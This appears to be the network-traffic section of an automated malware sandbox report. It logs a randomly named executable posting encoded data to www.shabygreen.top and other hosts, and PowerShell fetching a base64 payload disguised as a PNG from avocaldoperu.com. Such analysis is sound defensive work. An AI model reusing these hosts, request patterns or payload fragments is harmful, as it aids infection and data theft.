                                                            Data Ascii: 4NZpb=FjZUjWCymanCjtiWPUL60Istxt+KVXdyo6MBC37WItC4sW6EZFSMkDx1UrFTBDWZn+kO3lV7bI6PwFBX2MLvyqujmSSkEuTY5uA9eL83J/hqhfooweGDFy9Is+oxQvEG5DIAqyceh9ud3jxQf8fvxtDvmIBFB/Czhhoib3wUCqk455dAle/pfwNNJxRsVBGS6sBiqu/f1Z0fp8dnXbKWk6yuB0FV1pFIG38Z04EG7RZd02FwEpV7nYTF6sGGmFxNRsyW0+bAUUx78WJJ/RZOGrn66XV1zx6RXAccTxrqF0oxujekbRk8SRGO6RDeEOtMiXpTuuNA7l+vBzX1U+4EkZZnhzCJ2v96d0nJKvyrJ/C1df7EH0xeqgeydLfNxoa3uNS81MXkm83JsclIZ/0L5CsIpG8u6vNWoMUSRtdc4TFfEDmri9u9chMfptGUk7KiL4h6r4bYVL17YOTau8o1Z//yyBOhLO7iInuTkH3OAsqIFOwtsCFAzqeId764FztuTL2ylcy2R32d2uiftxv9Igp+ueU1E9fBRof4mtaKMRZ3fUgEnVNmxWyjZASywvnSP/GydqBu5j8eG8rB6n1Oc5auP8mMVNa6zAgeC+8OGTnhQFDhuNvyxSIsbPzTbZNmY1pmzcFdzYNRagVSjs5C+1Tbe4XMOcRzF+Pf+nsZpx1CpICiJfSE17GFIaAAV/s8m/4BELIxn1Ss72m5WYOGeqNmG8Z5SgkccPHrSawrJuzy02BbxxhuIa63SCHY5W0kesdRkxTSztMDYLHmp/1KLWb/DpugkVJDFleHqzC6R+6hUUUO9mkXPpqJVd4i0EK30MLgUHUielxRfDkvPAsAfxxeI95Wf5pzeb/YlFSLCA7IAL831pOSEMssQQOLeaafCEQzz2VpM0PLmLQrSy4t1qDgSLuZF1jeJLVUttGtWH/Gew/kUf7vmY1H/oYlmMg70fxUnNHv7nmFSPJCi1BIwO/IC63CHn9Ulsdya+98nRF2qU [TRUNCATED]
                                                            Aug 28, 2024 14:04:55.817486048 CEST410INHTTP/1.1 301 Moved Permanently
                                                            Content-Type: application/binary
                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                            Pragma: no-cache
                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                            Date: Wed, 28 Aug 2024 12:04:55 GMT
                                                            Location: https://www.openhandedvision.com/ehr0/
                                                            Server: ESF
                                                            Content-Length: 0
                                                            X-XSS-Protection: 0
                                                            X-Frame-Options: SAMEORIGIN
                                                            X-Content-Type-Options: nosniff
                                                            Connection: close


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            31192.168.2.449773142.250.186.14780792C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe
                                                            TimestampBytes transferredDirectionData
                                                            Aug 28, 2024 14:04:57.501735926 CEST520OUTGET /ehr0/?4NZpb=Ihx0gjzggpHnpfOGfxSnw6gJ5cOueV8x4eE1b1b3I+S/q3zjJWKl4z1sGY5aRiTkrNYY7Ux0aZSu93Is89zAj/+h+kKnKfyF/eA8fKZfI/46sMZqkqzIHBU=&8le=9XPp_0_hUrF45X HTTP/1.1
                                                            Host: www.openhandedvision.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                            Aug 28, 2024 14:04:58.729914904 CEST558INHTTP/1.1 301 Moved Permanently
                                                            Content-Type: application/binary
                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                            Pragma: no-cache
                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                            Date: Wed, 28 Aug 2024 12:04:58 GMT
                                                            Location: https://www.openhandedvision.com/ehr0/?4NZpb=Ihx0gjzggpHnpfOGfxSnw6gJ5cOueV8x4eE1b1b3I+S/q3zjJWKl4z1sGY5aRiTkrNYY7Ux0aZSu93Is89zAj/+h+kKnKfyF/eA8fKZfI/46sMZqkqzIHBU%3D&8le=9XPp_0_hUrF45X
                                                            Server: ESF
                                                            Content-Length: 0
                                                            X-XSS-Protection: 0
                                                            X-Frame-Options: SAMEORIGIN
                                                            X-Content-Type-Options: nosniff
                                                            Connection: close


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            32192.168.2.449774203.161.41.20580792C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe
                                                            TimestampBytes transferredDirectionData
                                                            Aug 28, 2024 14:05:04.191656113 CEST779OUTPOST /r9e8/ HTTP/1.1
                                                            Host: www.shabygreen.top
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 202
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: no-cache
                                                            Connection: close
                                                            Origin: http://www.shabygreen.top
                                                            Referer: http://www.shabygreen.top/r9e8/
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                            Data Raw: 34 4e 5a 70 62 3d 41 62 50 69 7a 77 46 30 74 34 44 61 73 41 57 4a 68 7a 74 36 79 56 65 63 5a 31 56 72 31 62 54 77 31 62 73 72 4a 55 43 72 72 50 72 64 73 70 4d 34 76 45 42 39 31 79 65 56 78 33 68 73 6b 79 54 4f 46 66 38 45 70 44 63 34 77 39 5a 31 2b 42 42 72 4f 53 32 4c 76 49 52 62 7a 2f 50 68 65 39 42 61 46 74 6e 52 52 31 75 54 66 4a 63 31 51 44 4a 68 4a 58 31 54 6c 4e 46 66 79 64 44 51 35 31 48 73 4a 6f 2b 67 51 73 75 6e 61 59 65 64 6c 55 65 51 73 2b 50 4e 56 6e 4c 47 37 74 48 6e 6e 77 41 34 49 50 47 73 78 44 77 35 66 35 48 6e 34 52 7a 76 6e 6f 73 6c 45 58 39 65 7a 77 51 36 47 59 47 38 34 67 3d 3d
                                                            Data Ascii: 4NZpb=AbPizwF0t4DasAWJhzt6yVecZ1Vr1bTw1bsrJUCrrPrdspM4vEB91yeVx3hskyTOFf8EpDc4w9Z1+BBrOS2LvIRbz/Phe9BaFtnRR1uTfJc1QDJhJX1TlNFfydDQ51HsJo+gQsunaYedlUeQs+PNVnLG7tHnnwA4IPGsxDw5f5Hn4RzvnoslEX9ezwQ6GYG84g==
                                                            Aug 28, 2024 14:05:04.819679022 CEST533INHTTP/1.1 404 Not Found
                                                            Date: Wed, 28 Aug 2024 12:05:04 GMT
                                                            Server: Apache
                                                            Content-Length: 389
                                                            Connection: close
                                                            Content-Type: text/html
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            33192.168.2.449775203.161.41.20580792C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe
                                                            TimestampBytes transferredDirectionData
                                                            Aug 28, 2024 14:05:06.721204042 CEST799OUTPOST /r9e8/ HTTP/1.1
                                                            Host: www.shabygreen.top
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 222
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: no-cache
                                                            Connection: close
                                                            Origin: http://www.shabygreen.top
                                                            Referer: http://www.shabygreen.top/r9e8/
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                            Data Raw: 34 4e 5a 70 62 3d 41 62 50 69 7a 77 46 30 74 34 44 61 73 67 6d 4a 6e 56 6c 36 30 31 65 62 63 31 56 72 38 37 54 4b 31 62 67 72 4a 57 75 37 73 39 50 64 73 49 38 34 39 58 5a 39 32 79 65 56 6f 48 68 70 75 53 54 46 46 66 77 32 70 47 6b 34 77 39 64 31 2b 45 6c 72 62 78 65 4d 75 59 52 5a 37 66 50 76 55 64 42 61 46 74 6e 52 52 31 54 47 66 4e 77 31 54 79 5a 68 49 79 41 46 70 74 46 65 6c 74 44 51 79 56 48 6f 4a 6f 2f 50 51 74 7a 76 61 61 6d 64 6c 57 47 51 73 72 76 4d 65 6e 4b 50 2f 74 47 44 6b 69 4e 64 43 63 50 6c 2b 30 59 6c 58 4a 50 61 39 58 69 31 32 5a 4e 79 57 58 5a 74 75 33 5a 4f 4c 62 37 31 6a 6b 6e 32 48 38 79 4b 31 52 61 41 74 76 4a 70 2f 51 43 44 36 58 77 3d
                                                            Data Ascii: 4NZpb=AbPizwF0t4DasgmJnVl601ebc1Vr87TK1bgrJWu7s9PdsI849XZ92yeVoHhpuSTFFfw2pGk4w9d1+ElrbxeMuYRZ7fPvUdBaFtnRR1TGfNw1TyZhIyAFptFeltDQyVHoJo/PQtzvaamdlWGQsrvMenKP/tGDkiNdCcPl+0YlXJPa9Xi12ZNyWXZtu3ZOLb71jkn2H8yK1RaAtvJp/QCD6Xw=
                                                            Aug 28, 2024 14:05:07.326870918 CEST533INHTTP/1.1 404 Not Found
                                                            Date: Wed, 28 Aug 2024 12:05:07 GMT
                                                            Server: Apache
                                                            Content-Length: 389
                                                            Connection: close
                                                            Content-Type: text/html
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            34192.168.2.449776203.161.41.20580792C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe
                                                            TimestampBytes transferredDirectionData
                                                            Aug 28, 2024 14:05:09.252142906 CEST10881OUTPOST /r9e8/ HTTP/1.1
                                                            Host: www.shabygreen.top
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 10302
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: no-cache
                                                            Connection: close
                                                            Origin: http://www.shabygreen.top
                                                            Referer: http://www.shabygreen.top/r9e8/
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                            Data Raw: 34 4e 5a 70 62 3d 41 62 50 69 7a 77 46 30 74 34 44 61 73 67 6d 4a 6e 56 6c 36 30 31 65 62 63 31 56 72 38 37 54 4b 31 62 67 72 4a 57 75 37 73 39 48 64 73 61 30 34 76 6e 6c 39 33 79 65 56 67 6e 68 6f 75 53 54 69 46 66 35 2f 70 47 59 43 77 34 42 31 2b 69 70 72 4b 67 65 4d 33 49 52 5a 35 66 50 69 65 39 41 51 46 70 4c 56 52 78 7a 47 66 4e 77 31 54 77 78 68 4f 6e 30 46 76 74 46 66 79 64 44 55 35 31 48 41 4a 72 50 31 51 74 32 4e 61 70 75 64 6b 32 57 51 67 34 48 4d 54 6e 4b 42 7a 4e 47 62 6b 69 42 4f 43 66 37 44 2b 78 6b 66 58 4c 54 61 39 79 54 72 71 49 4a 39 43 32 34 77 34 48 70 58 48 63 54 7a 6f 33 62 64 58 4a 33 66 32 79 36 62 69 63 31 6d 71 53 75 31 34 48 4e 43 50 2f 4c 56 32 45 2b 39 43 59 42 2b 49 33 4a 6a 2f 44 5a 4d 4e 65 2b 6c 65 43 7a 44 52 50 36 73 6a 57 46 59 52 51 5a 4c 75 73 46 56 46 55 38 53 38 6f 49 6e 6e 6d 55 55 46 2b 37 4d 32 32 2b 59 48 67 32 56 49 53 35 50 31 57 30 4a 30 55 70 6d 36 61 65 38 71 41 52 67 70 62 33 56 78 64 68 4c 57 50 6e 6c 70 63 69 6e 61 2f 6b 46 30 53 6f 53 34 68 68 68 [TRUNCATED]
                                                            Data Ascii: 4NZpb=AbPizwF0t4DasgmJnVl601ebc1Vr87TK1bgrJWu7s9Hdsa04vnl93yeVgnhouSTiFf5/pGYCw4B1+iprKgeM3IRZ5fPie9AQFpLVRxzGfNw1TwxhOn0FvtFfydDU51HAJrP1Qt2Napudk2WQg4HMTnKBzNGbkiBOCf7D+xkfXLTa9yTrqIJ9C24w4HpXHcTzo3bdXJ3f2y6bic1mqSu14HNCP/LV2E+9CYB+I3Jj/DZMNe+leCzDRP6sjWFYRQZLusFVFU8S8oInnmUUF+7M22+YHg2VIS5P1W0J0Upm6ae8qARgpb3VxdhLWPnlpcina/kF0SoS4hhhnZMGAP6ZubHNFNyAxusXBM8KAH11w9kfymoe8WMu/dQeEvb0lhlvcprijNhIyz4n9nVlxPZ1kAVK9UC/zwXSPqm34BXJ3Y/1eHiTk/XAsiU4OuwfYUVGEsvxZztXWOs4CwLoZIx3LNvyTdF7F+pAXytcU6X5dVWhQO3RaMV3fnqx7Y4DvJ0kJc8zLAptZlm926LgZCZbeEGmZEJebZ17lB/Y44SAgMCBSWJlSC8nY0BlOQ9mLrredHaK4v4r14b6Wm6Y9XM2IMttoGt9sxSgukpaKqvUTrFiE/WBrI135n70uCU5R86lx08VU8jAulrgWUQJ/S3CFBm2jby49yCC5tHZkEhcxBOgzWEKfSGFRC2kBnVKd/YWucq7QESypqxFnhsWLIyLGXnL/AWdLbWStrjfq6hM0ZEZBVof7cbbwr+cVJSgwpOnLY3Z5wRevj6tdP0rrNkGE3UvGEZ5ESIetd1UpiWEc81hNWX6YjnBKX1iFlsw05vE8PegwnroY+WBplHBVUvwk4GN8V2LK9h/HpT+Gc73IgiyLUEE3/sNGO0ysxS31BFP0pAACyxs8UgBZAUF1sFVeWsbUKi/u4YtWekfS7FDqW0CEVAg/FsIWlnD1i7nif/7OWFJI9/NtL8Rs9/uc+6ZVDN78TxYa34aDfkTVf6SeimGmx [TRUNCATED]
                                                            Aug 28, 2024 14:05:09.964644909 CEST533INHTTP/1.1 404 Not Found
                                                            Date: Wed, 28 Aug 2024 12:05:09 GMT
                                                            Server: Apache
                                                            Content-Length: 389
                                                            Connection: close
                                                            Content-Type: text/html
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            35192.168.2.449777203.161.41.20580792C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe
                                                            TimestampBytes transferredDirectionData
                                                            Aug 28, 2024 14:05:11.782677889 CEST514OUTGET /r9e8/?8le=9XPp_0_hUrF45X&4NZpb=NZnCwFpZhKq0sQLr3EYC0TyIV0Vt7qzpk8sJXmG0u+Dj16JHvnRy3RCRxkJB+yK1MPAIrV8029hJ5TdoPi+z2c1Lq4bOeIsIUJHbQyiTQ7hpVCcnWmpKoKk= HTTP/1.1
                                                            Host: www.shabygreen.top
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                            Aug 28, 2024 14:05:12.408523083 CEST548INHTTP/1.1 404 Not Found
                                                            Date: Wed, 28 Aug 2024 12:05:12 GMT
                                                            Server: Apache
                                                            Content-Length: 389
                                                            Connection: close
                                                            Content-Type: text/html; charset=utf-8
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                            HTTPS Proxied Packets

                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.449730104.21.62.2024437616C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-08-28 12:01:11 UTC170OUTGET /Jouse4.png HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                            Host: avocaldoperu.com
                                                            Connection: Keep-Alive
                                                            2024-08-28 12:01:12 UTC690INHTTP/1.1 200 OK
                                                            Date: Wed, 28 Aug 2024 12:01:12 GMT
                                                            Content-Type: image/png
                                                            Content-Length: 421524
                                                            Connection: close
                                                            Last-Modified: Tue, 27 Aug 2024 22:21:00 GMT
                                                            ETag: "66e94-620b1a7fdeb00"
                                                            Cache-Control: max-age=14400
                                                            CF-Cache-Status: REVALIDATED
                                                            Accept-Ranges: bytes
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dNpGVVnR4QJLGuIr4Wuq%2BkLy2jM25gySd2QS28qKmYDOY2s0NTW%2BmXM6qlKSa820D4H9iAnfxaZp%2BN%2BGUU74%2Ffp5oHzdtd2mNb3kwPg12yShlStAHRW0QxDt%2F4HOzXSjqrxb"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8ba42531df328c51-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2024-08-28 12:01:12 UTC679INData Raw: 63 51 47 62 63 51 47 62 75 39 51 68 43 77 42 78 41 5a 76 72 41 68 61 66 41 31 77 6b 42 48 45 42 6d 2b 73 43 6c 48 65 35 71 62 79 31 4f 33 45 42 6d 2b 73 43 69 35 53 42 38 62 34 71 76 35 78 78 41 5a 76 72 41 74 5a 4b 67 63 48 70 61 66 56 59 63 51 47 62 36 77 4c 64 45 6e 45 42 6d 33 45 42 6d 37 70 4f 2f 35 30 56 63 51 47 62 63 51 47 62 36 77 4c 4e 45 2b 73 43 72 53 34 78 79 75 73 43 4d 79 64 78 41 5a 75 4a 46 41 76 72 41 6f 54 67 36 77 49 78 73 74 48 69 63 51 47 62 63 51 47 62 67 38 45 45 36 77 4a 56 70 4f 73 43 6c 5a 47 42 2b 65 79 77 41 77 52 38 79 58 45 42 6d 2b 73 43 65 34 6d 4c 52 43 51 45 36 77 49 57 31 75 73 43 44 4b 71 4a 77 33 45 42 6d 33 45 42 6d 34 48 44 57 5a 4f 44 41 2b 73 43 2f 4b 44 72 41 6b 62 46 75 73 6c 55 55 72 6a 72 41 6b 37 30 63 51 47
                                                            Data Ascii: cQGbcQGbu9QhCwBxAZvrAhafA1wkBHEBm+sClHe5qby1O3EBm+sCi5SB8b4qv5xxAZvrAtZKgcHpafVYcQGb6wLdEnEBm3EBm7pO/50VcQGbcQGb6wLNE+sCrS4xyusCMydxAZuJFAvrAoTg6wIxstHicQGbcQGbg8EE6wJVpOsClZGB+eywAwR8yXEBm+sCe4mLRCQE6wIW1usCDKqJw3EBm3EBm4HDWZODA+sC/KDrAkbFuslUUrjrAk70cQG
                                                            2024-08-28 12:01:12 UTC1369INData Raw: 62 63 51 47 62 52 75 73 43 67 61 78 78 41 5a 75 41 66 41 72 37 75 48 58 64 63 51 47 62 63 51 47 62 69 30 51 4b 2f 48 45 42 6d 33 45 42 6d 79 6e 77 36 77 49 37 68 33 45 42 6d 2f 2f 53 36 77 4a 52 7a 48 45 42 6d 37 71 38 5a 77 51 41 63 51 47 62 36 77 49 43 64 7a 48 41 63 51 47 62 63 51 47 62 69 33 77 6b 44 48 45 42 6d 33 45 42 6d 34 45 30 42 36 52 30 50 67 6a 72 41 6a 6c 46 63 51 47 62 67 38 41 45 63 51 47 62 63 51 47 62 4f 64 42 31 35 58 45 42 6d 2b 73 43 66 61 32 4a 2b 2b 73 43 63 79 72 72 41 70 44 6a 2f 39 66 72 41 6d 32 7a 36 77 4a 49 69 53 32 52 2b 59 32 7a 69 38 48 33 5a 54 76 6c 5a 53 58 42 4b 66 64 62 69 30 66 79 57 37 57 2f 76 62 4f 4c 77 66 64 71 35 47 69 65 4a 63 45 70 39 31 75 4c 53 43 37 57 54 6e 4c 33 4b 57 50 42 39 31 73 42 79 56 30 74 6b 59
                                                            Data Ascii: bcQGbRusCgaxxAZuAfAr7uHXdcQGbcQGbi0QK/HEBm3EBmynw6wI7h3EBm//S6wJRzHEBm7q8ZwQAcQGb6wICdzHAcQGbcQGbi3wkDHEBm3EBm4E0B6R0PgjrAjlFcQGbg8AEcQGbcQGbOdB15XEBm+sCfa2J++sCcyrrApDj/9frAm2z6wJIiS2R+Y2zi8H3ZTvlZSXBKfdbi0fyW7W/vbOLwfdq5GieJcEp91uLSC7WTnL3KWPB91sByV0tkY
